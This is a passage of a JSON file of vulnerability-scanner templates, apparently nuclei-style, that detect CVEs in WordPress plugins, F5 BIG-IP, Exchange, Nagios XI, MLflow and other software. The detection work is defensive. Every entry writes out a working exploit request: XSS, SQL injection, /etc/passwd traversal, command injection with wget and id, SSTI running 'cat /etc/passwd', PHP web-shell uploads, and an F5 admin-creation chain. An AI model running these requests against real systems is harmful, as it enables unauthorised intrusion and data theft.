Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA</span>","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41749","info":{"name":"CraftCMS SEOmatic - Server-Side Template Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}\nCache-Control: max-age=0\n\n","GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb\nCache-Control: max-age=0\n\n"],"skip-variables-check":true,"stop-at-first-match":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"/{{marker}}{{result}}\") || regex(\"root:.*:0:0:\", body_2)","contains_any(body, \"Craft CMS\", \"SEOmatic\" ,\"CRAFT_CSRF\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n","GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)","sidekiq"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/wp-content/themes/bello/readme.txt"],"stop-at-first-match":true,"matchers":[{"type":"word","internal":true,"words":["wp-content/themes/bello/fonts","bold-themes.com/bello"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-43831","info":{"name":"Gradio < 2.5.0 - Arbitrary File 